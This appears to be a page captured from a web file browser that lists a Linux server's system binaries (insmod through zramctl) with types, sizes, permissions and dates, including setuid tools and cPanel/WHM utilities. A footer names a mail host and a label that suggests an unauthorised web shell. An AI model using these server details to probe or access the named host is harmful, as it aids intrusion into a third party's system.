2025-04-22 01:58:57
insmod
application/x-sharedlib
159.95 KB
-rwxr-xr-x
2024-04-08 09:18:53
install-info
application/x-sharedlib
50.23 KB
-rwxr-xr-x
2022-04-18 05:09:26
installkernel
text/x-shellscript
323 B
-rwxr-xr-x
2024-04-06 01:02:18
intel_sdsi
application/x-sharedlib
15.62 KB
-rwxr-xr-x
2025-10-20 08:13:36
iotop
text/x-python
511 B
-rwxr-xr-x
2024-04-06 02:56:51
ip
application/x-sharedlib
693.3 KB
-rwxr-xr-x
2024-05-23 08:36:03
ip6tables
application/x-sharedlib
220.8 KB
-rwxr-xr-x
2024-04-02 06:37:43
ip6tables-apply
text/x-shellscript
6.89 KB
-rwxr-xr-x
2024-04-02 06:37:41
ip6tables-restore
application/x-sharedlib
220.8 KB
-rwxr-xr-x
2024-04-02 06:37:43
ip6tables-restore-translate
application/x-sharedlib
220.8 KB
-rwxr-xr-x
2024-04-02 06:37:43
ip6tables-save
application/x-sharedlib
220.8 KB
-rwxr-xr-x
2024-04-02 06:37:43
ip6tables-translate
application/x-sharedlib
220.8 KB
-rwxr-xr-x
2024-04-02 06:37:43
ipmaddr
application/x-sharedlib
21 KB
-rwxr-xr-x
2020-08-30 05:47:39
iprconfig
application/x-sharedlib
408.03 KB
-rwxr-xr-x
2020-08-30 07:37:42
iprdbg
application/x-sharedlib
137.57 KB
-rwxr-xr-x
2020-08-30 07:37:42
iprdump
application/x-sharedlib
129.3 KB
-rwxr-xr-x
2020-08-30 07:37:42
iprinit
application/x-sharedlib
125.28 KB
-rwxr-xr-x
2020-08-30 07:37:42
iprsos
text/x-shellscript
2.18 KB
-rwxr-xr-x
2020-05-08 02:19:42
iprupdate
application/x-sharedlib
129.3 KB
-rwxr-xr-x
2020-08-30 07:37:42
ipset
application/x-sharedlib
9.01 KB
-rwxr-xr-x
2019-11-12 02:33:33
iptables
application/x-sharedlib
220.8 KB
-rwxr-xr-x
2024-04-02 06:37:43
iptables-apply
text/x-shellscript
6.89 KB
-rwxr-xr-x
2024-04-02 06:37:41
iptables-restore
application/x-sharedlib
220.8 KB
-rwxr-xr-x
2024-04-02 06:37:43
iptables-restore-translate
application/x-sharedlib
220.8 KB
-rwxr-xr-x
2024-04-02 06:37:43
iptables-save
application/x-sharedlib
220.8 KB
-rwxr-xr-x
2024-04-02 06:37:43
iptables-translate
application/x-sharedlib
220.8 KB
-rwxr-xr-x
2024-04-02 06:37:43
iptunnel
application/x-sharedlib
25 KB
-rwxr-xr-x
2020-08-30 05:47:39
irqbalance
application/x-sharedlib
62.28 KB
-rwxr-xr-x
2023-10-14 05:57:46
irqbalance-ui
application/x-sharedlib
41.29 KB
-rwxr-xr-x
2023-10-14 05:57:46
isc-hmac-fixup
application/x-sharedlib
11.85 KB
-rwxr-xr-x
2025-02-20 09:05:41
kacpimon
application/x-sharedlib
27.52 KB
-rwxr-xr-x
2019-10-14 04:19:15
kexec
application/x-sharedlib
194.98 KB
-rwxr-xr-x
2024-09-24 08:36:00
key.dns_resolver
application/x-sharedlib
24.52 KB
-rwxr-xr-x
2021-10-08 01:50:55
kpartx
application/x-sharedlib
49.05 KB
-rwxr-xr-x
2025-04-22 01:55:40
lchage
application/x-sharedlib
16.41 KB
-rwxr-xr-x
2024-09-24 02:24:38
ldattach
application/x-sharedlib
32.99 KB
-rwxr-xr-x
2024-04-06 01:02:53
ldconfig
application/x-sharedlib
986.02 KB
-rwxr-xr-x
2025-08-05 02:12:44
lfd
382.45 KB
-rwx------
2025-02-28 01:10:41
lgroupadd
application/x-sharedlib
11.88 KB
-rwxr-xr-x
2024-09-24 02:24:38
lgroupdel
application/x-sharedlib
11.88 KB
-rwxr-xr-x
2024-09-24 02:24:38
lgroupmod
application/x-sharedlib
19.88 KB
-rwxr-xr-x
2024-09-24 02:24:38
lid
application/x-sharedlib
16.27 KB
-rwxr-xr-x
2024-09-24 02:24:38
lnewusers
application/x-sharedlib
19.87 KB
-rwxr-xr-x
2024-09-24 02:24:38
lnstat
application/x-sharedlib
25.33 KB
-rwxr-xr-x
2024-05-23 08:36:03
load_policy
application/x-sharedlib
12.28 KB
-rwxr-xr-x
2024-07-02 09:04:21
logrotate
application/x-sharedlib
93.03 KB
-rwxr-xr-x
2023-04-02 12:29:07
logsave
application/x-sharedlib
16.41 KB
-rwxr-xr-x
2025-10-07 07:08:06
losetup
application/x-sharedlib
90.59 KB
-rwxr-xr-x
2024-04-06 01:02:53
lpasswd
application/x-sharedlib
20.35 KB
-rwxr-xr-x
2024-09-24 02:24:38
lshw
application/x-sharedlib
969.55 KB
-rwxr-xr-x
2025-10-07 08:50:28
lsmod
application/x-sharedlib
159.95 KB
-rwxr-xr-x
2024-04-08 09:18:53
luseradd
application/x-sharedlib
19.88 KB
-rwxr-xr-x
2024-09-24 02:24:38
luserdel
application/x-sharedlib
15.88 KB
-rwxr-xr-x
2024-09-24 02:24:38
lusermod
application/x-sharedlib
19.88 KB
-rwxr-xr-x
2024-09-24 02:24:38
lwresd
application/x-sharedlib
840.86 KB
-rwxr-xr-x
2025-02-20 09:05:41
makedumpfile
application/x-sharedlib
425.19 KB
-rwxr-xr-x
2024-09-24 08:36:00
mariadbd
application/x-sharedlib
24.3 MB
-rwxr-xr-x
2025-07-28 05:16:25
matchpathcon
application/x-sharedlib
12.37 KB
-rwxr-xr-x
2025-03-11 12:11:55
mii-diag
application/x-sharedlib
25.4 KB
-rwxr-xr-x
2020-08-30 05:47:39
mii-tool
application/x-sharedlib
21.03 KB
-rwxr-xr-x
2020-08-30 05:47:39
mkdict
text/x-shellscript
251 B
-rwxr-xr-x
2019-10-12 12:47:14
mkdumprd
text/x-shellscript
12.68 KB
-rwxr-xr-x
2024-09-24 08:36:00
mke2fs
application/x-sharedlib
138.45 KB
-rwxr-xr-x
2025-10-07 07:08:06
mkfadumprd
text/x-shellscript
2.23 KB
-rwxr-xr-x
2024-09-24 08:36:00
mkfs
application/x-sharedlib
16.47 KB
-rwxr-xr-x
2024-04-06 01:02:53
mkfs.cramfs
application/x-sharedlib
41.26 KB
-rwxr-xr-x
2024-04-06 01:02:53
mkfs.ext2
application/x-sharedlib
138.45 KB
-rwxr-xr-x
2025-10-07 07:08:06
mkfs.ext3
application/x-sharedlib
138.45 KB
-rwxr-xr-x
2025-10-07 07:08:06
mkfs.ext4
application/x-sharedlib
138.45 KB
-rwxr-xr-x
2025-10-07 07:08:06
mkfs.minix
application/x-sharedlib
86.55 KB
-rwxr-xr-x
2024-04-06 01:02:53
mkfs.xfs
application/x-sharedlib
475.98 KB
-rwxr-xr-x
2023-10-15 05:11:09
mkhomedir_helper
application/x-sharedlib
24.43 KB
-rwxr-xr-x
2025-08-26 08:59:03
mklost+found
application/x-sharedlib
11.86 KB
-rwxr-xr-x
2025-10-07 07:08:06
mksquashfs
application/x-sharedlib
186.83 KB
-rwxr-xr-x
2024-04-06 02:17:10
mkswap
application/x-sharedlib
86.47 KB
-rwxr-xr-x
2024-04-06 01:02:53
modinfo
application/x-sharedlib
159.95 KB
-rwxr-xr-x
2024-04-08 09:18:53
modprobe
application/x-sharedlib
159.95 KB
-rwxr-xr-x
2024-04-08 09:18:53
modsec-sdbm-util
25.83 KB
-rwxr-x---
2025-08-19 08:11:13
mount.nfs
application/x-sharedlib
197.24 KB
-rwsr-xr-x
2025-06-04 10:54:29
mount.nfs4
application/x-sharedlib
197.24 KB
-rwsr-xr-x
2025-06-04 10:54:29
mountstats
text/x-python
42.22 KB
-rwxr-xr-x
2025-06-04 10:53:59
mysqld
application/x-sharedlib
24.3 MB
-rwxr-xr-x
2025-07-28 05:16:25
named
application/x-sharedlib
840.86 KB
-rwxr-xr-x
2025-02-20 09:05:41
named-checkconf
application/x-sharedlib
36.77 KB
-rwxr-xr-x
2025-02-20 09:05:41
named-checkzone
application/x-sharedlib
36.63 KB
-rwxr-xr-x
2025-02-20 09:05:41
named-compilezone
application/x-sharedlib
36.63 KB
-rwxr-xr-x
2025-02-20 09:05:41
named-journalprint
application/x-sharedlib
11.85 KB
-rwxr-xr-x
2025-02-20 09:05:41
nameif
application/x-sharedlib
16.98 KB
-rwxr-xr-x
2020-08-30 05:47:39
newusers
application/x-sharedlib
107.23 KB
-rwxr-xr-x
2024-04-06 02:00:13
nfsconf
application/x-sharedlib
37.48 KB
-rwxr-xr-x
2025-06-04 10:54:29
nfsconvert
text/x-python
13.03 KB
-rwxr-xr-x
2025-06-04 10:54:28
nfsdcld
application/x-sharedlib
65.87 KB
-rwxr-xr-x
2025-06-04 10:54:29
nfsdclddb
text/plain
10 KB
-rwxr-xr-x
2025-06-04 10:53:59
nfsdclnts
text/plain
9.02 KB
-rwxr-xr-x
2025-06-04 10:53:59
nfsdcltrack
application/x-sharedlib
49.78 KB
-rwxr-xr-x
2025-06-04 10:54:29
nfsidmap
application/x-sharedlib
45.36 KB
-rwxr-xr-x
2025-06-04 10:54:29
nfsiostat
text/x-python
23.36 KB
-rwxr-xr-x
2025-06-04 10:53:59
nfsref
application/x-sharedlib
65.8 KB
-rwxr-xr-x
2025-06-04 10:54:29
nfsstat
application/x-sharedlib
35.52 KB
-rwxr-xr-x
2025-06-04 10:54:29
nft
application/x-sharedlib
24.41 KB
-rwxr-xr-x
2025-01-28 01:24:57
nologin
application/x-sharedlib
11.87 KB
-rwxr-xr-x
2024-04-06 01:02:53
nscd
application/x-sharedlib
160.68 KB
-rwxr-xr-x
2025-08-05 02:12:44
nsec3hash
application/x-sharedlib
12.29 KB
-rwxr-xr-x
2025-02-20 09:05:41
nstat
application/x-sharedlib
113.57 KB
-rwxr-xr-x
2024-05-23 08:36:03
ownership
application/x-sharedlib
12.4 KB
-rwxr-xr-x
2024-04-06 01:04:35
packer
application/x-sharedlib
13.05 KB
-rwxr-xr-x
2019-10-12 12:47:15
pam_console_apply
application/x-sharedlib
45.2 KB
-rwxr-xr-x
2025-08-26 08:59:03
pam_timestamp_check
application/x-sharedlib
11.87 KB
-rwsr-xr-x
2025-08-26 08:59:03
paperconfig
text/x-shellscript
4.07 KB
-rwxr-xr-x
2019-10-12 08:09:13
parted
application/x-sharedlib
85.6 KB
-rwxr-xr-x
2021-10-08 03:43:26
partprobe
application/x-sharedlib
16.39 KB
-rwxr-xr-x
2021-10-08 03:43:26
partx
application/x-sharedlib
94.5 KB
-rwxr-xr-x
2024-04-06 01:02:53
pidof
application/x-sharedlib
16.7 KB
-rwxr-xr-x
2023-10-14 08:31:02
ping
application/x-sharedlib
66.13 KB
-rwxr-xr-x
2023-10-14 05:19:01
ping6
application/x-sharedlib
66.13 KB
-rwxr-xr-x
2023-10-14 05:19:01
pivot_root
application/x-sharedlib
12.38 KB
-rwxr-xr-x
2024-04-06 01:02:53
plipconfig
application/x-sharedlib
12.71 KB
-rwxr-xr-x
2020-08-30 05:47:39
plymouth-set-default-theme
text/x-shellscript
6.05 KB
-rwxr-xr-x
2022-04-18 04:44:56
plymouthd
application/x-sharedlib
141.97 KB
-rwxr-xr-x
2022-04-18 04:45:15
postgresql-new-systemd-unit
text/x-shellscript
3.05 KB
-rwxr-xr-x
2024-02-27 08:24:43
poweroff
application/x-sharedlib
218.45 KB
-rwxr-xr-x
2025-04-22 01:58:57
pure-authd
application/x-sharedlib
19.23 KB
-rwxr-xr-x
2024-10-30 12:42:11
pure-certd
application/x-sharedlib
19.13 KB
-rwxr-xr-x
2024-10-30 12:42:11
pure-config.pl
text/x-perl
4.64 KB
-rwxr-xr-x
2024-10-30 12:41:43
pure-ftpd
application/x-sharedlib
182.06 KB
-rwxr-xr-x
2024-10-30 12:42:11
pure-ftpwho
application/x-sharedlib
26.82 KB
-rwxr-xr-x
2024-10-30 12:42:11
pure-mrtginfo
application/x-sharedlib
11.16 KB
-rwxr-xr-x
2024-10-30 12:42:11
pure-quotacheck
application/x-sharedlib
18.81 KB
-rwxr-xr-x
2024-10-30 12:42:11
pure-uploadscript
application/x-sharedlib
19.07 KB
-rwxr-xr-x
2024-10-30 12:42:11
pwck
application/x-sharedlib
57.27 KB
-rwxr-xr-x
2024-04-06 02:00:13
pwconv
application/x-sharedlib
53.1 KB
-rwxr-xr-x
2024-04-06 02:00:13
pwhistory_helper
application/x-sharedlib
20.44 KB
-rwxr-xr-x
2025-08-26 08:59:03
pwunconv
application/x-sharedlib
53.13 KB
-rwxr-xr-x
2024-04-06 02:00:13
quot
application/x-sharedlib
78.67 KB
-rwxr-xr-x
2021-10-09 07:08:37
quotacheck
application/x-sharedlib
115.75 KB
-rwxr-xr-x
2021-10-09 07:08:37
quotaoff
application/x-sharedlib
83.16 KB
-rwxr-xr-x
2021-10-09 07:08:37
quotaon
application/x-sharedlib
83.16 KB
-rwxr-xr-x
2021-10-09 07:08:37
quotastats
application/x-sharedlib
16.54 KB
-rwxr-xr-x
2021-10-09 07:08:37
rdisc
application/x-sharedlib
24.55 KB
-rwxr-xr-x
2023-10-14 05:19:01
rdma
application/x-sharedlib
187.38 KB
-rwxr-xr-x
2024-05-23 08:36:02
readprofile
application/x-sharedlib
20.55 KB
-rwxr-xr-x
2024-04-06 01:02:53
reboot
application/x-sharedlib
218.45 KB
-rwxr-xr-x
2025-04-22 01:58:57
repquota
application/x-sharedlib
83.24 KB
-rwxr-xr-x
2021-10-09 07:08:37
request-key
application/x-sharedlib
24.38 KB
-rwxr-xr-x
2021-10-08 01:50:55
resize2fs
application/x-sharedlib
64.91 KB
-rwxr-xr-x
2025-10-07 07:08:06
resizepart
application/x-sharedlib
41.56 KB
-rwxr-xr-x
2024-04-06 01:02:53
resolvconf
application/x-sharedlib
195.74 KB
-rwxr-xr-x
2025-04-22 01:58:57
restorecon
application/x-sharedlib
20.53 KB
-rwxr-xr-x
2024-07-02 09:04:21
restorecon_xattr
application/x-sharedlib
16.41 KB
-rwxr-xr-x
2024-07-02 09:04:21
rfkill
application/x-sharedlib
53.46 KB
-rwxr-xr-x
2024-04-06 01:02:53
rmmod
application/x-sharedlib
159.95 KB
-rwxr-xr-x
2024-04-08 09:18:53
rndc
application/x-sharedlib
36.53 KB
-rwxr-xr-x
2025-02-20 09:05:41
rndc-confgen
application/x-sharedlib
20.45 KB
-rwxr-xr-x
2025-02-20 09:05:41
rotatelogs
application/x-sharedlib
30.51 KB
-rwxr-xr-x
2025-10-15 08:39:07
route
application/x-sharedlib
67.63 KB
-rwxr-xr-x
2020-08-30 05:47:39
rpc.gssd
application/x-sharedlib
106.55 KB
-rwxr-xr-x
2025-06-04 10:54:29
rpc.idmapd
application/x-sharedlib
61.73 KB
-rwxr-xr-x
2025-06-04 10:54:29
rpc.mountd
application/x-sharedlib
158.92 KB
-rwxr-xr-x
2025-06-04 10:54:29
rpc.nfsd
application/x-sharedlib
49.91 KB
-rwxr-xr-x
2025-06-04 10:54:29
rpc.statd
application/x-sharedlib
103.29 KB
-rwxr-xr-x
2025-06-04 10:54:29
rpcbind
application/x-sharedlib
61.55 KB
-rwxr-xr-x
2022-10-12 11:00:54
rpcctl
text/plain
9.41 KB
-rwxr-xr-x
2025-06-04 10:53:59
rpcdebug
application/x-sharedlib
19.38 KB
-rwxr-xr-x
2025-06-04 10:54:28
rpcinfo
application/x-sharedlib
32.64 KB
-rwxr-xr-x
2022-10-12 11:00:54
rsyslogd
application/x-sharedlib
724.73 KB
-rwxr-xr-x
2024-11-05 02:34:13
rtacct
application/x-sharedlib
46.94 KB
-rwxr-xr-x
2024-05-23 08:36:02
rtcwake
application/x-sharedlib
49.31 KB
-rwxr-xr-x
2024-04-06 01:02:53
rtmon
application/x-sharedlib
117.27 KB
-rwxr-xr-x
2024-05-23 08:36:02
rtstat
application/x-sharedlib
25.33 KB
-rwxr-xr-x
2024-05-23 08:36:03
runlevel
application/x-sharedlib
218.45 KB
-rwxr-xr-x
2025-04-22 01:58:57
runq
application/x-executable
1.49 MB
-rwsr-xr-x
2025-05-12 05:54:51
runuser
application/x-sharedlib
48.99 KB
-rwxr-xr-x
2024-04-06 01:02:53
sasldblistusers2
application/x-sharedlib
20.77 KB
-rwxr-xr-x
2022-02-23 08:13:56
saslpasswd2
application/x-sharedlib
16.42 KB
-rwxr-xr-x
2022-02-23 08:13:56
sefcontext_compile
application/x-sharedlib
65.35 KB
-rwxr-xr-x
2025-03-11 12:11:55
selabel_digest
application/x-sharedlib
12.28 KB
-rwxr-xr-x
2025-03-11 12:11:55
selabel_lookup
application/x-sharedlib
12.27 KB
-rwxr-xr-x
2025-03-11 12:11:55
selabel_lookup_best_match
application/x-sharedlib
11.89 KB
-rwxr-xr-x
2025-03-11 12:11:55
selabel_partial_match
application/x-sharedlib
11.88 KB
-rwxr-xr-x
2025-03-11 12:11:55
selinux_check_access
application/x-sharedlib
12.36 KB
-rwxr-xr-x
2025-03-11 12:11:55
selinuxconlist
application/x-sharedlib
11.88 KB
-rwxr-xr-x
2025-03-11 12:11:55
selinuxdefcon
application/x-sharedlib
11.88 KB
-rwxr-xr-x
2025-03-11 12:11:55
selinuxenabled
application/x-sharedlib
7.84 KB
-rwxr-xr-x
2025-03-11 12:11:55
selinuxexeccon
application/x-sharedlib
11.86 KB
-rwxr-xr-x
2025-03-11 12:11:55
semodule
application/x-sharedlib
29.27 KB
-rwxr-xr-x
2024-07-02 09:04:21
sendmail
application/x-executable
16.91 KB
-rwxr-sr-x
2025-05-12 05:54:51
service
text/x-shellscript
3.64 KB
-rwxr-xr-x
2022-08-10 01:03:37
sestatus
application/x-sharedlib
20.41 KB
-rwxr-xr-x
2024-07-02 09:04:21
setcap
application/x-sharedlib
16.27 KB
-rwxr-xr-x
2024-01-10 02:34:46
setenforce
application/x-sharedlib
12.27 KB
-rwxr-xr-x
2025-03-11 12:11:55
setfiles
application/x-sharedlib
20.53 KB
-rwxr-xr-x
2024-07-02 09:04:21
setquota
application/x-sharedlib
91.38 KB
-rwxr-xr-x
2021-10-09 07:08:37
setsebool
application/x-sharedlib
16.38 KB
-rwxr-xr-x
2024-07-02 09:04:21
sfdisk
application/x-sharedlib
118.5 KB
-rwxr-xr-x
2024-04-06 01:02:53
showmount
application/x-sharedlib
21.06 KB
-rwxr-xr-x
2025-06-04 10:54:29
shutdown
application/x-sharedlib
218.45 KB
-rwxr-xr-x
2025-04-22 01:58:57
sim_server
application/x-sharedlib
11.87 KB
-rwxr-xr-x
2025-06-03 02:06:30
slattach
application/x-sharedlib
43.76 KB
-rwxr-xr-x
2020-08-30 05:47:39
sm-notify
application/x-sharedlib
78.14 KB
-rwxr-xr-x
2025-06-04 10:54:29
smartctl
application/x-sharedlib
907.08 KB
-rwxr-xr-x
2024-04-06 02:11:24
smartd
application/x-sharedlib
733.2 KB
-rwxr-xr-x
2024-04-06 02:11:24
snmpd
application/x-sharedlib
32.45 KB
-rwxr-xr-x
2025-10-07 09:19:27
snmptrapd
application/x-sharedlib
32.6 KB
-rwxr-xr-x
2025-10-07 09:19:27
ss
application/x-sharedlib
191.3 KB
-rwxr-xr-x
2024-05-23 08:36:02
sshd
application/x-sharedlib
869.75 KB
-rwxr-xr-x
2025-09-30 10:44:15
sss_cache
application/x-sharedlib
61.09 KB
-rwxr-xr-x
2025-06-05 07:42:53
sssd
application/x-sharedlib
73.01 KB
-rwxr-xr-x
2025-06-05 07:42:53
start-statd
text/x-shellscript
838 B
-rwxr-xr-x
2018-09-06 06:09:08
start-stop-daemon
application/x-sharedlib
45.98 KB
-rwxr-xr-x
2021-12-15 12:46:22
suexec
application/x-sharedlib
25.3 KB
-rwsr-xr-x
2025-10-15 08:39:07
sulogin
application/x-sharedlib
49.24 KB
-rwxr-xr-x
2024-04-06 01:02:53
suphp
6.56 MB
-rwsr-x---
2025-10-15 08:46:40
sw-engine-fpm
application/x-executable
20.12 MB
-rwxr-xr-x
1990-01-01 12:00:00
swaplabel
application/x-sharedlib
16.5 KB
-rwxr-xr-x
2024-04-06 01:02:53
swapoff
application/x-sharedlib
20.74 KB
-rwxr-xr-x
2024-04-06 01:02:53
swapon
application/x-sharedlib
49.4 KB
-rwxr-xr-x
2024-04-06 01:02:53
switch_root
application/x-sharedlib
16.49 KB
-rwxr-xr-x
2024-04-06 01:02:53
sysctl
application/x-sharedlib
28.88 KB
-rwxr-xr-x
2023-10-14 08:31:02
syspurpose
text/x-python
415 B
-rwxr-xr-x
2025-07-15 09:13:46
tcpdump
application/x-sharedlib
1.01 MB
-rwxr-xr-x
2024-04-06 11:58:14
tcpslice
application/x-sharedlib
32.63 KB
-rwxr-xr-x
2024-04-06 11:58:14
tcsd
application/x-sharedlib
309.72 KB
-rwxr-xr-x
2024-04-06 12:42:24
telinit
application/x-sharedlib
218.45 KB
-rwxr-xr-x
2025-04-22 01:58:57
timedatex
application/x-sharedlib
33.43 KB
-rwxr-xr-x
2019-10-16 05:24:08
tipc
application/x-sharedlib
163.07 KB
-rwxr-xr-x
2024-05-23 08:36:02
tmpwatch
application/x-sharedlib
35.47 KB
-rwxr-xr-x
2019-10-12 11:32:29
tracepath
application/x-sharedlib
20.44 KB
-rwxr-xr-x
2023-10-14 05:19:01
tracepath6
application/x-sharedlib
20.44 KB
-rwxr-xr-x
2023-10-14 05:19:01
tsig-keygen
application/x-sharedlib
20.46 KB
-rwxr-xr-x
2025-02-20 09:05:41
tune2fs
application/x-sharedlib
110.63 KB
-rwxr-xr-x
2025-10-07 07:08:06
tuned
text/x-python
3.88 KB
-rwxr-xr-x
2024-02-22 12:23:28
tuned-adm
text/x-python
6.5 KB
-rwxr-xr-x
2024-02-22 12:23:28
udevadm
application/x-sharedlib
424.59 KB
-rwxr-xr-x
2025-04-22 01:58:57
umount.nfs
application/x-sharedlib
197.24 KB
-rwsr-xr-x
2025-06-04 10:54:29
umount.nfs4
application/x-sharedlib
197.24 KB
-rwsr-xr-x
2025-06-04 10:54:29
unbound-anchor
application/x-sharedlib
57.34 KB
-rwxr-xr-x
2025-07-28 01:31:47
unix_chkpwd
application/x-sharedlib
36.86 KB
-rwsr-xr-x
2025-08-26 08:59:03
unix_update
36.87 KB
-rwx------
2025-08-26 08:59:03
unsquashfs
application/x-sharedlib
99.57 KB
-rwxr-xr-x
2024-04-06 02:17:10
update-alternatives
application/x-sharedlib
36.66 KB
-rwxr-xr-x
2023-10-14 10:48:04
update-smart-drivedb
text/x-shellscript
14.44 KB
-rwxr-xr-x
2024-04-06 02:11:23
useradd
application/x-sharedlib
148.17 KB
-rwxr-xr-x
2024-04-06 02:00:13
userdel
application/x-sharedlib
107.29 KB
-rwxr-xr-x
2024-04-06 02:00:13
usermod
application/x-sharedlib
144.07 KB
-rwxr-xr-x
2024-04-06 02:00:13
usernetctl
application/x-sharedlib
12.4 KB
-rwxr-xr-x
2022-10-08 11:08:06
uuserver
application/x-sharedlib
15.88 KB
-rwxr-xr-x
2025-06-03 02:06:30
vdpa
application/x-sharedlib
118.04 KB
-rwxr-xr-x
2024-05-23 08:36:02
vigr
application/x-sharedlib
68.05 KB
-rwxr-xr-x
2024-04-06 02:00:13
vipw
application/x-sharedlib
68.05 KB
-rwxr-xr-x
2024-04-06 02:00:13
virt-what
text/x-shellscript
14.22 KB
-rwxr-xr-x
2023-10-14 08:52:05
visudo
application/x-sharedlib
239.28 KB
-rwxr-xr-x
2025-08-26 09:02:52
vmcore-dmesg
application/x-sharedlib
28.58 KB
-rwxr-xr-x
2024-09-24 08:36:00
vpddecode
application/x-sharedlib
16.47 KB
-rwxr-xr-x
2024-04-06 01:04:35
weak-modules
text/x-shellscript
33.6 KB
-rwxr-xr-x
2024-04-08 09:18:53
whmapi0
application/x-executable
3.18 MB
-rwxr-xr-x
2025-10-16 10:57:41
whmapi1
application/x-executable
3.18 MB
-rwxr-xr-x
2025-10-16 10:57:41
whmlogin
text/x-perl
2.33 KB
-rwxr-xr-x
2024-03-04 05:44:29
wipefs
application/x-sharedlib
41.11 KB
-rwxr-xr-x
2024-04-06 01:02:53
xfs_admin
text/x-shellscript
1.38 KB
-rwxr-xr-x
2023-10-15 05:10:59
xfs_bmap
text/x-shellscript
695 B
-rwxr-xr-x
2023-10-15 05:11:00
xfs_copy
application/x-sharedlib
434.59 KB
-rwxr-xr-x
2023-10-15 05:11:09
xfs_db
application/x-sharedlib
760.47 KB
-rwxr-xr-x
2023-10-15 05:11:09
xfs_estimate
application/x-sharedlib
12.39 KB
-rwxr-xr-x
2023-10-15 05:11:09
xfs_freeze
text/x-shellscript
800 B
-rwxr-xr-x
2023-10-15 05:11:00
xfs_fsr
application/x-sharedlib
53.41 KB
-rwxr-xr-x
2023-10-15 05:11:09
xfs_growfs
application/x-sharedlib
422.48 KB
-rwxr-xr-x
2023-10-15 05:11:09
xfs_info
text/x-shellscript
1.26 KB
-rwxr-xr-x
2023-10-15 05:11:02
xfs_io
application/x-sharedlib
188.28 KB
-rwxr-xr-x
2023-10-15 05:11:09
xfs_logprint
application/x-sharedlib
454.7 KB
-rwxr-xr-x
2023-10-15 05:11:09
xfs_mdrestore
application/x-sharedlib
410.09 KB
-rwxr-xr-x
2023-10-15 05:11:09
xfs_metadump
text/x-shellscript
782 B
-rwxr-xr-x
2023-10-15 05:10:59
xfs_mkfile
text/x-shellscript
1.02 KB
-rwxr-xr-x
2023-10-15 05:11:00
xfs_ncheck
text/x-shellscript
685 B
-rwxr-xr-x
2023-10-15 05:10:59
xfs_quota
application/x-sharedlib
93.98 KB
-rwxr-xr-x
2023-10-15 05:11:09
xfs_repair
application/x-sharedlib
715.24 KB
-rwxr-xr-x
2023-10-15 05:11:09
xfs_rtcp
application/x-sharedlib
16.38 KB
-rwxr-xr-x
2023-10-15 05:11:09
xfs_spaceman
application/x-sharedlib
45.42 KB
-rwxr-xr-x
2023-10-15 05:11:09
xqmstats
application/x-sharedlib
16.45 KB
-rwxr-xr-x
2021-10-09 07:08:37
xtables-monitor
application/x-sharedlib
220.8 KB
-rwxr-xr-x
2024-04-02 06:37:43
xtables-nft-multi
application/x-sharedlib
220.8 KB
-rwxr-xr-x
2024-04-02 06:37:43
zdump
application/x-sharedlib
20.57 KB
-rwxr-xr-x
2025-08-05 02:12:44
zic
application/x-sharedlib
52.83 KB
-rwxr-xr-x
2025-08-05 02:12:44
zramctl
application/x-sharedlib
99.09 KB
-rwxr-xr-x
2024-04-06 01:02:53
~ ACUPOFTEA - mail.ontime-ae.com